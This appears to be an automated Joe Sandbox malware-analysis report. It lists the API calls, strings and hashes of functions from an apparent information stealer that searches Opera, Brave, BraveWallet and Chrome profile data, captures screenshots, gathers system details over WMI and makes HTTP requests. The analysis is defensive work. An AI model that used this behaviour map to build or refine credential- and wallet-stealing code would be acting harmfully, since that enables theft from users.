Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001,004371BC,004367CB,?,?,?), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E0), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371E4), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: ec7be3799cd7f1ab7ede32318a87e8319299868577f2a08bed39a97cfb64081b
Instruction ID: 0113a041bf9ee0dc6d25ba3745982a96817547ff9a9362ffbbee30bd04a7c4bd
Opcode Fuzzy Hash: ec7be3799cd7f1ab7ede32318a87e8319299868577f2a08bed39a97cfb64081b
Instruction Fuzzy Hash: 6AE14F72A00209AFCF01FFA1ED4A9DD7B76AF04309F10102AF541B71A1DB796E958F98

Function 00409D1C Relevance: 40.9, APIs: 18, Strings: 5, Instructions: 610
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,004367F1,004367EB,0043731C,004367EA,?,?,?), ref: 00409DC6
StrCmpCA.SHLWAPI(?,00437320), ref: 00409DE7
StrCmpCA.SHLWAPI(?,00437324), ref: 00409E01

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 00410581

StrCmpCA.SHLWAPI(?,Opera GX,00437328,?,004367F2), ref: 00409E93
StrCmpCA.SHLWAPI(?,Brave,00437348,0043734C,00437328,?,004367F2), ref: 0040A015
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
StrCmpCA.SHLWAPI(?), ref: 0040A1FC
StrCmpCA.SHLWAPI(?), ref: 0040A266
StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

StrCmpCA.SHLWAPI(?), ref: 0040A35C
CopyFileA.KERNEL32(?,?,00000001,00437384,004367FB), ref: 0040A41C
StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
DeleteFileA.KERNEL32(?), ref: 0040A522

Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF

Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B

StrCmpCA.SHLWAPI(?), ref: 0040A553
CopyFileA.KERNEL32(?,?,00000001,00437398,004367FE), ref: 0040A613
DeleteFileA.KERNEL32(?), ref: 0040A6AA

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

FindNextFileA.KERNEL32(?,?), ref: 0040A76E
FindClose.KERNEL32(?), ref: 0040A782

Strings

Opera GX, xrefs: 00409E8B
Brave, xrefs: 0040A00D
Preferences, xrefs: 0040A023
\BraveWallet\Preferences, xrefs: 0040A105
Google Chrome, xrefs: 0040A4B9

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3650549319-1189830961
Opcode ID: ab1596694eb10fdb4e735c31f894bac6e0a9e3dab77473d2ef205fbe758805b8
Instruction ID: 4238d5646a94c2e6c52f09f94c377ce4c391e708cb42f0175f2145d9089a2d10
Opcode Fuzzy Hash: ab1596694eb10fdb4e735c31f894bac6e0a9e3dab77473d2ef205fbe758805b8
Instruction Fuzzy Hash: 50422C319401299BCF21FB65DD46BCD7775AF04308F4101AAF848B31A2DB79AED98F89

Function 00415F9A Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415FE1
FindFirstFileA.KERNEL32(?,?), ref: 00415FF8
StrCmpCA.SHLWAPI(?,00436AAC), ref: 00416019
StrCmpCA.SHLWAPI(?,00436AB0), ref: 00416033
wsprintfA.USER32 ref: 0041605A
StrCmpCA.SHLWAPI(?,00436647), ref: 0041606E
wsprintfA.USER32 ref: 0041608B
wsprintfA.USER32 ref: 004160A2
PathMatchSpecA.SHLWAPI(?,?), ref: 004160B8
lstrcatA.KERNEL32(?), ref: 004160EE
lstrcatA.KERNEL32(?,00436AC8), ref: 00416100
lstrcatA.KERNEL32(?,?), ref: 00416113
lstrcatA.KERNEL32(?,00436ACC), ref: 00416125
lstrcatA.KERNEL32(?,?), ref: 00416139
FindNextFileA.KERNEL32(?,?), ref: 004162C8
FindClose.KERNEL32(?), ref: 004162DC

Strings

%s\*, xrefs: 00415FD5
%s\%s, xrefs: 00416054
%s\%s, xrefs: 0041609C

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3541214880-445461498
Opcode ID: f81e380f71539b663dd536a4ab21c2be376926e67a4efed720e748e646f96403
Instruction ID: dc53ff5765f85fba633ff4d74b61ff0985eb58c7502a078ec5ac58dc47376483
Opcode Fuzzy Hash: f81e380f71539b663dd536a4ab21c2be376926e67a4efed720e748e646f96403
Instruction Fuzzy Hash: 2481187190022DABCF60EF61DC45ACD77B9BF08305F0194E6E549A3150EF7AAB898F94

Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 0041180E
CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EC2,Install Date: ,004368A8,00000000,Windows: ,00436898,Work Dir: In memory,00436880), ref: 0041181F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF58,?,00000018,00411901,?), ref: 00411781
Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1

FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
HeapAlloc.KERNEL32(00000000), ref: 0041191D
VariantClear.OLEAUT32(?), ref: 0041195C
wsprintfA.USER32 ref: 00411949

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Strings

Select * From Win32_OperatingSystem, xrefs: 00411895
ROOT\CIMV2, xrefs: 00411862
%d/%d/%d %d:%d:%d, xrefs: 00411943
Unknown, xrefs: 00411985
WQL, xrefs: 0041189A
Unknown, xrefs: 00411971
InstallDate, xrefs: 004118ED
Unknown, xrefs: 0041196A

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: c0eb11b5ee436968efa1db024099a12e82d4b95c474fb4b1889a75565c543515
Instruction ID: 9306796a99560fb33f0370de2d740fe648c40d1cf9c9c5eb00c71453775374cf
Opcode Fuzzy Hash: c0eb11b5ee436968efa1db024099a12e82d4b95c474fb4b1889a75565c543515
Instruction Fuzzy Hash: CD418D71900209BBCB10DBD5DC89EEFBBBDEFC9B11F20410AF211E6190D6799941CB28

Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
StrCmpCA.SHLWAPI(?), ref: 004069DF
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Strings

ERROR, xrefs: 00406AB6
GET, xrefs: 00406A42
ERROR, xrefs: 00406BAB

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 3863758870-2509457195
Opcode ID: 6431f3359e5692bdcce1fd5c08df26fa15010f3ad37444dfef77aa2c043da059
Instruction ID: bb4040bcd68c85501e469f0edee38108df75f90e77bbd350ac247b3d876c4702
Opcode Fuzzy Hash: 6431f3359e5692bdcce1fd5c08df26fa15010f3ad37444dfef77aa2c043da059
Instruction Fuzzy Hash: 91519EB1A00169AFDF20EB60DC85AEEB7B9FB04344F0180F6F549B2190DA755EC59F94

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436982,0043697F,0043697E,00436973), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: 2f03e383a5c0d785367292fdecadebf89992f7ac8ba0b18ad9d360e758d66a88
Instruction ID: 00722b0fd45776afd759679ccd3a1a7a6ce102eef846c08e099e3bb1de5592fc
Opcode Fuzzy Hash: 2f03e383a5c0d785367292fdecadebf89992f7ac8ba0b18ad9d360e758d66a88
Instruction Fuzzy Hash: 8451EA72900218AFDF15EFA1ED498EEBFBAFF08315F045425F901E2120E7369A55DB61

Function 00415406 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00415433
FindFirstFileA.KERNEL32(?,?), ref: 0041544A
StrCmpCA.SHLWAPI(?,00436A78), ref: 0041546B
StrCmpCA.SHLWAPI(?,00436A7C), ref: 00415485
lstrcatA.KERNEL32(?), ref: 004154D6
lstrcatA.KERNEL32(?), ref: 004154E9
lstrcatA.KERNEL32(?,?), ref: 004154FD
lstrcatA.KERNEL32(?,?), ref: 00415510
lstrcatA.KERNEL32(?,00436A80), ref: 00415522
lstrcatA.KERNEL32(?,?), ref: 00415536

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

FindNextFileA.KERNEL32(?,?), ref: 004155EC
FindClose.KERNEL32(?), ref: 00415600

Strings

%s\%s, xrefs: 00415427

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 950e748add10b56019b716e3e17e2d78282fafab6a2b0565a7a312f115b1aa57
Instruction ID: 1b8820ae2a53e2d1c5371ccfb362d69c41e3a58b2797d9f0c433b52c96bff2bc
Opcode Fuzzy Hash: 950e748add10b56019b716e3e17e2d78282fafab6a2b0565a7a312f115b1aa57
Instruction Fuzzy Hash: 33514FB190021C9BCF64DF60CC89AC9B7BDEB49305F1044E6E609E3250EB369B85CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682A,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437468), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,0043746C), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,0043683F,0043683E,0043683B,0043683A,0043682F,0043682E,0043682B), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
\*.*, xrefs: 0040BF73
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
